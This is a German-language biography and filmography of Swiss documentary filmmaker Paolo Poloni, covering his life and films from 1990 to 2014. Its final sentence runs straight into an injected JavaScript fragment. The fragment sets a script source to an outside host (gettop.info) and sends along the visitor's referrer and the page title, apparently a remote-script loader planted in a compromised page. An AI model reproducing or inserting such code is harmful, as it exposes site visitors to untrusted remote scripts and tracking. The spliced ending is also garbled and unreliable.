Mulhapar-Paolo-Poloni

Paolo Poloni

Geboren 1954 in Luzern, Matura, Studium Romanistik und Philosophie in Zürich, Fribourg und Paris, Lehrer, Schiffsbauer, Reisender, mehrere sabbathische Jahre und dann, ab 1990 Filmemacher und Produzent, mehr selbst als ständig.

 

2014 – Mulhapar Kinodokumentarfilm (Kinoverleih: LOOK NOW!)

2012 – Weihnachten in Mulhapar TV-Dokumentarfilm

2011 – Der Italiener Kinodokumentarfilm

2010 – Mein italienisches Restaurant Kinodokumentarfilm

2009 – Ringen mit Gott und Menschen TV-Dokumentarfilm

2008 Santa Lucia TV- Dokumentarfilm

2007 – Héritage Kinodokumentarfilm

2006 – Salonica Kinodokumentarfilm

2005 – Eine Strasse namens Josef TV-Dokumentarfilm

2004 – Die Ratte, Die Stadt, das Gift TV-Dokumentarfilm

2003 – Viaggio a Misterbianco Kinodokumentarfilm

2002 – Onoma 6 Kurzfilme für Expo

2002 – Mit allen Sinnen Dokumentarfilm

2000 – Giorgio Orelli TV-Portrait

1999 – Asinara TV-Dokumentarfilm

1998 – Fondovalle Spielfilm

1995 – Rites de passages TV-Dokumentarfilm

1995 – A map for Eritrea TV-Dokumentarfilm

1994 – Asmara Kinodokumentarfilm (Kinoverleih: LOOK NOW!)

1991 – Witschi geht Kinodokumentarfilm (Kinoverleih: LOOK NOW!)

1990 – Volver TV-Dokumentarfilm

Ausser SALONICA (Produktion: Rose Marie Schneider), MEIN ITALIENISCHES RESTAURANT (Paul Riniker), WEIHNACHTEN UND MULHAPAR und MULHAPAR (RECK Filmproduktion) sind alle Filme von Paolo Poloni, extramuros film, Zürich, produziert worden.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;